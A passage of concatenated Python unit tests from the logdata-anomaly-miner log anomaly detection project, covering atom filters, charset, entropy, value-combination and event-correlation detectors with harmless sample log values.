MatchContext(self.fixed_string) match_element = fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, allowlist_violation_detector) self.assertTrue(allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), '') fixed_dme = FixedDataModelElement('s3', self.fixed_string) match_context = MatchContext(self.fixed_string) match_element = fixed_dme.get_match_element('match', match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, path_exists_match_rule) self.assertTrue(not allowlist_violation_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), allowlist_violation_detector.__class__.__name__, description, 1, "fixed String")) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/AtomFiltersTest.py000066400000000000000000000211601437606560100272520ustar00rootroot00000000000000import unittest from aminer.analysis.AtomFilters import SubhandlerFilter, MatchPathFilter, MatchValueFilter from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from unit.TestBase import TestBase class AtomFiltersTest(TestBase): """Unittests for the AtomFilters.""" match_context_fixed_dme = MatchContext(b'25000') fixed_dme = FixedDataModelElement('s1', b'25000') match_element_fixed_dme = fixed_dme.get_match_element("fixed", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(b'25000') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element("integer", match_context_decimal_integer_value_me) def test1_no_list_or_no_atom_handler_list(self): """This test case verifies, that exceptions are raised when using wrong parameters.""" self.assertRaises(Exception, SubhandlerFilter, NewMatchPathDetector(self.aminer_config, [], 'Default', True), False) self.assertRaises(Exception, SubhandlerFilter, FixedDataModelElement('fixed', b'gesuchter String'), False) def test2receive_atom_unhandled(self): """In this test case no handler can handle the log atom.""" description = "Test2AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) subhandler_filter = SubhandlerFilter([], True) self.assertTrue(not subhandler_filter.receive_atom(log_atom_fixed_dme)) def test3receive_atom_handled_by_more_handlers(self): """In this test case more than one handler can handle the log atom. The impact of the stop_when_handled flag is tested.""" description = "Test3AtomFilters" other_description = "Test3OtherAtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() other_new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(other_new_match_path_detector, other_description) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) subhandler_filter = SubhandlerFilter([new_match_path_detector, other_new_match_path_detector], False) self.assertTrue(subhandler_filter.receive_atom(log_atom_fixed_dme)) result = self.output_stream.getvalue() self.reset_output_stream() new_match_path_detector.receive_atom(log_atom_fixed_dme) result_fixed_dme = self.output_stream.getvalue() self.reset_output_stream() other_new_match_path_detector.receive_atom(log_atom_fixed_dme) result_decimal_integer_value_me = self.output_stream.getvalue() self.assertEqual(result, result_fixed_dme + result_decimal_integer_value_me) def test4match_path_filter_receive_atom_path_in_dictionary(self): """There is a path in the dictionary and the handler is not None. The default_parsed_atom_handler is None.""" description = "Test4AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_path_filter = MatchPathFilter([(self.match_element_fixed_dme.get_path(), new_match_path_detector)], None) self.assertTrue(match_path_filter.receive_atom(log_atom_fixed_dme)) def test5match_path_filter_receive_atom_path_not_in_dictionary(self): """The searched path is not in the dictionary. The default_parsed_atom_handler is None.""" description = "Test5AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_path_filter = MatchPathFilter([(self.match_element_decimal_integer_value_me.get_path(), new_match_path_detector)], None) self.assertTrue(not match_path_filter.receive_atom(log_atom_fixed_dme)) def test6match_path_filter_receive_atom_path_not_in_dictionary_default_set(self): """The searched path is not in the dictionary. The default_parsed_atom_handler is set.""" description = "Test6AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_path_filter = MatchPathFilter([(self.match_element_decimal_integer_value_me.get_path(), new_match_path_detector)], new_match_path_detector) self.assertTrue(match_path_filter.receive_atom(log_atom_fixed_dme)) def test7match_value_filter_receive_atom_target_value_and_handler_found(self): """A target_value and a handler, which can handle the matchObject is found.""" description = "Test7AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_value_filter = MatchValueFilter(self.match_element_fixed_dme.get_path(), {self.fixed_dme.fixed_data: new_match_path_detector}, None) self.assertTrue(match_value_filter.receive_atom(log_atom_fixed_dme)) def test8match_value_filter_receive_atom_target_value_found_handler_not_found(self): """A target_value was found, but no handler can handle it. DefaultParsedAtomHandler = None.""" description = "Test8AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_value_filter = MatchValueFilter(self.match_element_fixed_dme.get_path(), {self.fixed_dme.fixed_data: None}, None) self.assertTrue(not match_value_filter.receive_atom(log_atom_fixed_dme)) def test9match_value_filter_receive_atom_target_value_not_found(self): """No target_value was found in the dictionary.""" description = "Test9AtomFilters" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False) self.analysis_context.register_component(new_match_path_detector, description) t = time.time() log_atom_fixed_dme = LogAtom(b'24999', ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) match_value_filter = MatchValueFilter(self.match_element_fixed_dme.get_path(), {self.fixed_dme.fixed_data: None}, None) self.assertTrue(not match_value_filter.receive_atom(log_atom_fixed_dme)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/CharsetDetectorTest.py000066400000000000000000000137521437606560100301140ustar00rootroot00000000000000import unittest from aminer.analysis.CharsetDetector import CharsetDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomaly = None # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomaly = evdat class CharsetDetectorTest(TestBase): """Unittests for the ValueRangeDetectorDetector.""" def test1_normal_sequence_detection(self): """ This test case checks the normal detection of new character sets. The charset detector is used to learn an alphabet and detect new characters for different identifiers. """ description = "Test1CharsetDetector" # Initialize detector test_handler = TestHandler() event_charset_detector = CharsetDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 'Default', True, False) self.analysis_context.register_component(event_charset_detector, description) # Prepare log atoms that represent two entities (id) with strings (value). Anomalies are generated when new characters are observed. # The following events are generated: # id: a value: abc # id: b value: xyz # id: a value: asdf # id: a value: xxx # id: a value: bass # id: a value: max m_1 = MatchElement('/model/id', b'a', b'a', None) m_2 = MatchElement('/model/value', b'abc', b'abc', None) match_element_1 = MatchElement('/model', b'aabc', b'aabc', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'aabc', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'b', b'b', None) m_4 = MatchElement('/model/value', b'xyz', b'xyz', None) match_element_2 = MatchElement('/model', b'bxyz', b'bxyz', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'bxyz', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'a', b'a', None) m_6 = MatchElement('/model/value', b'asdf', b'asdf', None) match_element_3 = MatchElement('/model', b'aasdf', b'aasdf', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'aasdf', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'a', b'a', None) m_8 = MatchElement('/model/value', b'xxx', b'xxx', None) match_element_4 = MatchElement('/model', b'bxxx', b'bxxx', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'bxxx', parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'a', b'a', None) m_10 = MatchElement('/model/value', b'bass', b'bass', None) match_element_5 = MatchElement('/model', b'abass', b'abass', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'abass', parser_match_5, 5, None) m_11 = MatchElement('/model/id', b'a', b'a', None) m_12 = MatchElement('/model/value', b'max', b'max', None) match_element_6 = MatchElement('/model', b'bmax', b'bmax', [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b'bmax', parser_match_6, 6, None) # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: abc # Expected output: None event_charset_detector.receive_atom(log_atom_1) self.assertIsNone(test_handler.anomaly) # First value of id (b) should not generate an anomaly # Input: id: b value: xyz # Expected output: None event_charset_detector.receive_atom(log_atom_2) self.assertIsNone(test_handler.anomaly) # Second value of id (a) should generate an anomaly for new characters ('sdf' of 'asdf' not in 'abc') # Input: id: a value: asdf # Expected output: Anomaly event_charset_detector.receive_atom(log_atom_3) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': ['asdf'], 'MissingCharacters': ['s', 'd', 'f']}}) test_handler.anomaly = None # Third value of id (a) should generate an anomaly for new characters ('x' not in 'abcsdf', only in 'xyz' from other id (b)) # Input: id: a value: xxx # Expected output: Anomaly event_charset_detector.receive_atom(log_atom_4) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': ['xxx'], 'MissingCharacters': ['x']}}) test_handler.anomaly = None # Fourth value of id (a) should not generate an anomaly (all characters of 'bass' in 'abcsdfx') # Input: id: a value: bass # Expected output: None event_charset_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) # Fifth value of id (a) should generate an anomaly for new characters ('m' of 'max' not in 'abcsdfx') event_charset_detector.receive_atom(log_atom_6) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': ['max'], 'MissingCharacters': ['m']}}) test_handler.anomaly = None if __name__ == "__main__": unittest.main() EnhancedNewMatchPathValueComboDetectorTest.py000066400000000000000000000334331437606560100343700ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysisimport unittest from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.input.LogAtom import LogAtom from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from unit.TestBase import TestBase import time from datetime import datetime class EnhancedNewMatchPathValueComboDetectorTest(TestBase): """Unittests for the EnhancedNewMatchPathValueComboDetector.""" __expected_string = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n' __expected_allowlisting_string = 'Allowlisted path(es) %s with %s.' fixed_dme = FixedDataModelElement('s1', b'25537 uid=') fixed_dme2 = FixedDataModelElement('s2', b' uid=2') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_sequence_me = MatchContext(b'25537 uid=2') seq = SequenceModelElement('seq', [fixed_dme, decimal_integer_value_me]) match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me) match_context_sequence_me2 = MatchContext(b'25537 uid=2') seq2 = SequenceModelElement('seq2', [decimal_integer_value_me, fixed_dme2]) match_element_sequence_me2 = seq2.get_match_element('second', match_context_sequence_me2) first_seq_s1 = 'first/seq/s1' first_seq_d1 = 'first/seq/d1' datetime_format_string = '%Y-%m-%d %H:%M:%S' exp_str = " first/seq: 25537 uid=2\n " + first_seq_s1 + ": 25537 uid=\n " + first_seq_d1 + \ ": 2\n{(b'25537 uid=', 2): [%s, %s, 1]}" exp_str2 = " {(b'25537 uid=', 2): [%s, %s, 1]}\n25537 uid=2" def test1_log_atom_not_known(self): """ This test case checks the correct processing of unknown log lines, which in reality means that an anomaly has been found. The output is directed to an output stream and compared for accuracy. The learn_mode is False and the output must be repeatable on second run. """ description = "Test1EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, self.exp_str2 % (t, t))) self.reset_output_stream() log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t + 2, enhanced_new_match_path_value_combo_detector) # repeating should produce the same result with new extraData. self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 2).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, " {(b'25537 uid=', 2): [%s, %s, 2]}\n25537 uid=2" % (t, t + 2))) self.reset_output_stream() enhanced_new_match_path_value_combo_detector2 = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ 'second/seq2/d1', 'second/seq2/s2'], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector2, description + "2") log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, enhanced_new_match_path_value_combo_detector2) # other MatchElement self.assertTrue(enhanced_new_match_path_value_combo_detector2.receive_atom(log_atom_sequence_me2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(25537, b' uid=2'): [%s, %s, 1]}\n25537 uid=2" % (t, t))) def test2_log_atom_known(self): """ This test case checks the functionality of the learn_mode. If the same MatchElement is processed a second time and the learn_mode was True, no event must be triggered. """ description = "Test2EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, self.exp_str2 % (t, t))) self.reset_output_stream() t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) # repeating should NOT produce the same result, only persist the new extraData. self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), '') self.reset_output_stream() enhanced_new_match_path_value_combo_detector2 = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ 'second/seq2/d1', 'second/seq2/s2'], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector2, description + "2") log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, enhanced_new_match_path_value_combo_detector2) # other MatchElement self.assertTrue(enhanced_new_match_path_value_combo_detector2.receive_atom(log_atom_sequence_me2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(25537, b' uid=2'): [%s, %s, 1]}\n25537 uid=2" % (t, t))) def test3_log_atom_known_from_persisted_data(self): """The persisting and reading of permitted log lines should be checked with this test.""" description = "Test3EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = round(time.time(), 3) log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) self.assertTrue(enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description, 1, self.exp_str2 % (t, t))) enhanced_new_match_path_value_combo_detector.do_persist() self.reset_output_stream() other_enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(other_enhanced_new_match_path_value_combo_detector, description + "2") other_log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t + 2, other_enhanced_new_match_path_value_combo_detector) self.assertTrue(other_enhanced_new_match_path_value_combo_detector.receive_atom(other_log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 2).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(b'25537 uid=', 2): [%s, %s, 2]}\n25537 uid=2" % (t, t + 2))) self.reset_output_stream() other_log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t + 5, other_enhanced_new_match_path_value_combo_detector) self.assertTrue(other_enhanced_new_match_path_value_combo_detector.receive_atom(other_log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + 5).strftime(self.datetime_format_string), enhanced_new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " {(b'25537 uid=', 2): [%s, %s, 3]}\n25537 uid=2" % (t, t + 5))) def test4_allowlist_event_with_known_and_unknown_paths(self): """This test case checks in which cases an event is triggered and compares with expected results.""" description = "Test4EnhancedNewMatchPathValueComboDetector" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(enhanced_new_match_path_value_combo_detector, description) t = time.time() self.assertEqual(enhanced_new_match_path_value_combo_detector.allowlist_event( 'Analysis.%s' % enhanced_new_match_path_value_combo_detector.__class__.__name__, self.match_element_sequence_me.get_path(), None), self.__expected_allowlisting_string % ( ', '.join(enhanced_new_match_path_value_combo_detector.target_path_list), self.match_element_sequence_me.get_path())) log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, enhanced_new_match_path_value_combo_detector) enhanced_new_match_path_value_combo_detector.learn_mode = False self.assertEqual(enhanced_new_match_path_value_combo_detector.allowlist_event( 'Analysis.%s' % enhanced_new_match_path_value_combo_detector.__class__.__name__, [log_atom_sequence_me2.get_timestamp(), self.match_element_sequence_me2.get_path()], None), self.__expected_allowlisting_string % (', '.join(enhanced_new_match_path_value_combo_detector.target_path_list), [ log_atom_sequence_me2.get_timestamp(), self.match_element_sequence_me2.path])) def test5save_metadata(self): """This test case checks the correctness of the metadata information.""" enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ['first/f1/s1'], [ self.stream_printer_event_handler], 'Default', False, True, None, output_logline=False) t = 1 log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_sequence_me), t, enhanced_new_match_path_value_combo_detector) enhanced_new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me) self.assertEqual(enhanced_new_match_path_value_combo_detector.known_values_dict.get((self.fixed_dme.fixed_data, (t, t, 1))), None) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EntropyDetectorTest.py000066400000000000000000000120371437606560100301560ustar00rootroot00000000000000import unittest from aminer.analysis.EntropyDetector import EntropyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomaly = None # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomaly = evdat class EntropyDetectorTest(TestBase): """Unittests for the EntropyDetector.""" def test1_normal_sequence_detection(self): """ This test case checks the normal detection of new character sets. The charset detector is used to learn an alphabet and detect new characters for different identifiers. """ description = "Test1EntropyDetector" # Initialize detector test_handler = TestHandler() event_entropy_detector = EntropyDetector(self.aminer_config, [test_handler], ['/value'], 0.05, False, False, 'Default', True, False) self.analysis_context.register_component(event_entropy_detector, description) # Prepare log atoms that represent string values. Anomalies are detected when character pair distributions deviate. # The following events are generated: # value: aminer # value: logdata-anomaly-miner # value: ait-aecid # value: austrian # value: institute # value: lfmvasacz m_1 = MatchElement('/value', b'aminer', b'aminer', None) parser_match_1 = ParserMatch(m_1) log_atom_1 = LogAtom(b'aminer', parser_match_1, 1, None) m_2 = MatchElement('/value', b'logdata-anomaly-miner', b'logdata-anomaly-miner', None) parser_match_2 = ParserMatch(m_2) log_atom_2 = LogAtom(b'logdata-anomaly-miner', parser_match_2, 2, None) m_3 = MatchElement('/value', b'ait-aecid', b'ait-aecid', None) parser_match_3 = ParserMatch(m_3) log_atom_3 = LogAtom(b'ait-aecid', parser_match_3, 3, None) m_4 = MatchElement('/value', b'austrian', b'austrian', None) parser_match_4 = ParserMatch(m_4) log_atom_4 = LogAtom(b'austrian', parser_match_4, 4, None) m_5 = MatchElement('/value', b'institute', b'institute', None) parser_match_5 = ParserMatch(m_5) log_atom_5 = LogAtom(b'institute', parser_match_5, 5, None) m_6 = MatchElement('/value', b'lfmvasacz', b'lfmvasacz', None) parser_match_6 = ParserMatch(m_6) log_atom_6 = LogAtom(b'lfmvasacz', parser_match_6, 6, None) # Forward log atoms to detector # First value should generate an anomaly, because no frequencies are known yet # Input: aminer # Expected output: Anomaly event_entropy_detector.receive_atom(log_atom_1) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['aminer'], 'CriticalValue': 0.0, 'ProbabilityThreshold': 0.05}}) test_handler.anomaly = None # Second value should not generate an anomaly, because it contains substring 'miner' which shares charpairs with 'aminer' # Input: logdata-anomaly-miner # Expected output: None event_entropy_detector.receive_atom(log_atom_2) self.assertIsNone(test_handler.anomaly) # Third value should not generate an anomaly, since it is a normal string # Input: ait-aecid # Expected output: None event_entropy_detector.receive_atom(log_atom_3) self.assertIsNone(test_handler.anomaly) # Fourth value should not generate an anomaly, since it is a normal string # Input: austrian # Expected output: None event_entropy_detector.receive_atom(log_atom_4) self.assertIsNone(test_handler.anomaly) # Fifth value should not generate an anomaly, since it is a normal string # Input: institute # Expected output: None event_entropy_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) # Sixth value should generate an anomaly, since it is a randomly generated string # Input: lfmvasacz # Expected output: Anomaly event_entropy_detector.receive_atom(log_atom_6) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['lfmvasacz'], 'CriticalValue': 0.02, 'ProbabilityThreshold': 0.05}}) test_handler.anomaly = None if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventCorrelationDetectorTest.py000066400000000000000000000400731437606560100320020ustar00rootroot00000000000000import unittest from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector, set_random_seed from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from unit.TestBase import TestBase from time import time import random class EventCorrelationDetectorTest(TestBase): """Unittests for the EventCorrelationDetector.""" alphabet = b'abcdefghijklmnopqrstuvwxyz' alphabet_model = None analysis = 'Analysis.%s' @classmethod def setUpClass(cls): """Set up the data for the all tests.""" children = [] for _, val in enumerate(cls.alphabet): char = bytes([val]) children.append(FixedDataModelElement(char.decode(), char)) cls.alphabet_model = FirstMatchModelElement('first', children) error_rate = 0.000085 cls.perfect_data_diff5 = cls.generate_perfect_data(cls, 30000, 5) cls.perfect_data_diff1 = cls.generate_perfect_data(cls, 30000, 1) cls.errored_data_diff5 = cls.generate_errored_data(cls, 100000, 5, error_rate) cls.errored_data_diff1 = cls.generate_errored_data(cls, 100000, 1, error_rate) cls.errored_data_diff5_low_error_rate = cls.generate_errored_data(cls, 100000, 5, error_rate / 2.5) cls.errored_data_diff1_low_error_rate = cls.generate_errored_data(cls, 100000, 1, error_rate / 2.5) set_random_seed(42) def test1learn_from_clear_examples(self): """In this test case perfect examples are used to learn and evaluate rules. The default parameters are used.""" description = 'test1eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:12000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.perfect_data_diff1[:12000]) def test2learn_from_clear_examples_with_smaller_probabilities(self): """ Like in test1 perfect examples are used. The generation_probability and generation_factor are set to 0.5 in the first case and 0.1 in the second case. The EventCorrelationDetector should still learn the rules as expected. """ description = 'test2eventCorrelationDetectorTest' ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.5, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.perfect_data_diff1[:30000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.perfect_data_diff5[:100000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.3, generation_factor=0.3, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.perfect_data_diff1[:100000]) def test3learn_from_examples_with_errors(self): """In this test case examples with errors are used, but still should be learned. The same parameters like in test1 are used.""" description = 'test3eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, 